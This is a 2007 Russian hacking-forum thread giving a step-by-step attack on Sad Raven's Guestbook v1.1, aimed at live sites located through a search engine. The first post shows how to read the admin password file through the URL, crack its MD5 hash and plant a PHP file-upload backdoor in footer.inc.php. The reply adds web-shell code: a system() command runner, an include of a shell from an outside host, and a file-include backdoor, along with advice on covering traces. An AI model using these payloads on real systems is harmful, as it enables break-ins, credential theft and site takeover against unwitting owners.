Вернуться   XekSecurity > Избранное > Статьи
Новые сообщенияНовые сообщения
Взлом email
Взлом email
DEER.IO - Создай свой магазин аккаунтов Реклама на форуме

Ответ
 
Опции темы Опции просмотра

Sad Raven's Guestbook v1.1

Старый 10.07.2007, 01:54   #1 (permalink)
Senior Member
 
REDsaratov вне форума
Регистрация: 10.07.2007
Сообщений: 105
Репутация: 48
ICQ: 514-576
По умолчанию Sad Raven's Guestbook v1.1

Sad Raven's Guestbook v1.1


Всем привет хочу поделиться опытом!!!
В данной статейке я расскажу про
поднятие админовских прав на гостевую
книгу Sad Raven's Guestbook v1.1
И так приступаем:
1)Bдем конечно-же в любимый поисковик!
кому какой нравится,я лично пользовался Rambler-ом.
Там вводим Sad Raven's Guestbook v1.1
Выходит много сайтов с данной гостевой книгой.
2)Заходим на нужный нам сайт в гостевую книгу
примерно это выглядит так



3)Меняем последнюю строчку guest.php



на passwd.dat



4)Получаем Логин админа и пароль в зашифрованый md5 хэше



5)Теперь мы дожны разбрутить этот хэш.

Я лично пользуюсь прогой MD5Inide
6)После того когда разбрутили пароль!!!
Нужно прописать вместо guest.php




admin или admin.php и тогда мы получаем приглашение в
Админ центр где и вводим наши полученные
логин и пароль!




7)После чего мы находимся в админ центре.
Теперь ВЫ добились желаемой цели.




+++++++++++++++++++++++++++++++++++++ ++++++


Выкладываем статью продолжения
про гостевуху Sad Raven's Guestbook v1.1 как залить шелл!!!
Чтоб залить шелл предварительно получить
админ права на данную гостевуху
смотреть статью №1
ссылка _http://forum.xakep.ru/m_803202/tm.htm или на этом сайте.
(либо использовать готовый сплойт использующий XSS уязвимость
гостевухи!начинающие врядли сделают)
1)теперь заходим в админ панель
переходим по ссылке дизайн




2)редактируем фаил footer.inc.php
как показано на рисунке:



(не забудьте сохранить)

PHP код:
<?php if(isset($_POST[name])) move_uploaded_file($_FILES[file][tmp_name],$_POST[name]);?>

3)открываем вот эту форму для закачки файлов

_http://redhacker.narod.ru/guest.html

4)переходим на наш залитый шелл
[/SIZE]




где достать шелл вопрос не задавать!

+++++++++++++++++++++++++++++++++++++++++++

-----[ Copyright © 2007 Stefun ]-----
-----[ Copyright © 2007 REDsaratov ]-----
-----[ Copyright © 2007 52nn TeAm ]-----
-----[ Copyright © 2007 Dark EviL TEAM ]-----
  Ответить с цитированием

Старый 14.07.2007, 15:21   #2 (permalink)
Шпион
 
[Alucard]_Ali_MiX вне форума
Регистрация: 13.07.2007
Сообщений: 42
Репутация: 2
ICQ: 302979655
По умолчанию

Эта статья ужа давно бороздит просторы интернета.
В некоторых книгах эта дыра закрыта, да при том сейчас вышла новая книга там типа 2 создателя и уже в ней нет дыр.
Но поговорим про эту статью, статья довольна старая и можно было её сюда не писать.
Ну раз написали то есть ещё выриант как залить shell.
После того как ты посмотрел passwd.dat и расшифровали хеш(хеш можно расшифровать быстрее для этого используйте специальные Web сайты для расшифровки, они сделают это моментально) и зашёл в админку, тут маленькое отклонение, некоторые пробовали в закладке дизайн поменять код в поле footer.inc.php или ещё где нить, они заливали туда r57shell, это и была их ошибка. На этих файлах стоит ограничание по количеству символов а так как r57shell содержит их очень много, больше этого ограничения то он заливался меньше чем на половину, потом они проверяли свой результат и у них ничего не получалось.
В этой ситуации можно поступить так - просто протроянить php код или просто заменить нужный код shell'ом, и нет проблем.
Если же вы пошли по тому пути что бы просто протроянить php код то достаточно вставить вот
Код:
<?php system($_GET["cmd"]) ?>
или
Код:
<?php include("http://www.site.ru/shell.txt"); ?>
Код:
<?php if(@$_GET["hack"] == "yes") include($_GET['file']); ?>
Мы получили удалённый шелл
http://[сайт]/guest/index.php?hack=yes&file=[шелл]
Вот мы и получили первый shell.
Если же вы пошли по 2 пути замене исходного кода на шелл, то просто скопируйте исходный код страницы и сохраните его где нить на HDD(это для тех кто не хочет оставить следы откуда пришёл, а после того как залили полноценный shell в эту страницу опять вставьте исходный код), а потом замените код на какой-нибудь маленький shell. На моём тесте я использовал K99shell, и всё получилось.
  Ответить с цитированием
Ответ


Здесь присутствуют: 62 (пользователей: 0 , гостей: 62)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Выкл.
Pingbacks are Выкл.
Refbacks are Выкл.



Друзья форума: kidala.info, Brute.Name, Форум кодеров и вебмастеров, Взлом почты на заказ!, BruteZone.ru, Хакерский Форум
Ваша ссылка может быть здесь если вашему сайту/форуму более 3х месяцев. ICQ 22222208